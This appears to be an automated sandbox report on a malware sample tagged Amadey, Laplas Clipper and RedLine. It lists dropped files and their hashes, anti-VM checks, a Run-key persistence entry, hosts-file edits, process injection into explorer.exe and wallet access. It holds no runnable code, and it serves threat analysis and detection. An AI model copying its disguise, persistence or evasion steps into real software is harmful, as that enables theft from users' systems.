\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2216-262-0x000000013F270000-0x00000001400BA000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/3036-266-0x000000013F270000-0x00000001400BA000-memory.dmp

memory/2408-275-0x0000000000890000-0x0000000001331000-memory.dmp

memory/2408-280-0x0000000000890000-0x0000000001331000-memory.dmp

memory/3036-283-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/1976-285-0x00000000071E0000-0x0000000007220000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 17e9a9e536912fb90bf04747356c88bc
SHA1 e7381cf2ce16647f6fa62baf1bd1a1bc7233d1ee
SHA256 bff996229d6934d73b9264a2493fa471f2ceba9e6ec1c5b00cd27576122f3341
SHA512 91a9cdda2541c93bb75a577b24406eac6660b8e87ed2a8c190dad34a36c75957d3adfbf24c29ff619ef772e588e75c6b808798b4bc0f3c0041b9f99aa475bf05

memory/860-288-0x00000000289B0000-0x00000000292F3000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 17e9a9e536912fb90bf04747356c88bc
SHA1 e7381cf2ce16647f6fa62baf1bd1a1bc7233d1ee
SHA256 bff996229d6934d73b9264a2493fa471f2ceba9e6ec1c5b00cd27576122f3341
SHA512 91a9cdda2541c93bb75a577b24406eac6660b8e87ed2a8c190dad34a36c75957d3adfbf24c29ff619ef772e588e75c6b808798b4bc0f3c0041b9f99aa475bf05

memory/860-293-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/860-292-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/2848-291-0x0000000000940000-0x0000000001283000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 04:50

Reported

2023-07-29 04:55

Platform

win10-20230703-en

Max time kernel

300s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Program Files\Google\Chrome\updater.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3444 set thread context of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1384 set thread context of 2328 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1384 set thread context of 4992 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
